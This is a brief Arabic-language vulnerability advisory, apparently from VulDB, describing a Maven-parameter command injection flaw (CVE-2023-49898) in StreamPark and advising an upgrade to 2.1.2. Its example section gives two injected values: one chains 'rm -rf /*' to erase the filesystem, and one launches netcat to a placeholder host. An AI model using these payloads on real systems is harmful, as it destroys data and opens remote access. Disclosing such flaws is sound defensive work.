CVE-2023-49898 in StreamPark
الملخص
بحسب VulDB • 27/06/2026
في streampark، يوجد وحدة مشروع تدمج قدرة Maven على التجميع (Compilation). ومع ذلك، لا توجد تحقق من معاملات التجميع الخاصة بـ Maven، مما يسمح للمهاجمين بإدخال أوامر لتنفيذ الأوامر عن بُعد. الشرط المسبق لنجاح الهجوم هو أن يحتاج المستخدم إلى تسجيل الدخول إلى نظام streampark ولديه صلاحيات على مستوى النظام. بشكل عام، فقط مستخدمو ذلك النظام لديهم التفويض لتسجيل الدخول، ولن يقوم المستخدمين بإدخال أمر تشغيل خطير يدويًا. لذلك، فإن مستوى خطر هذا الثغرة منخفض جداً.
التخفيف:
يجب على جميع المستخدمين الترقية إلى الإصدار 2.1.2
مثال:
## يمكنك تخصيص طريقة الربط وفقاً لوضع تجميع المشروع، نتائج تجميع mvn تستخدم &&، فشل التجميع يستخدم "||" أو "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
If you want to get best quality of vulnerability data, you may have to visit VulDB.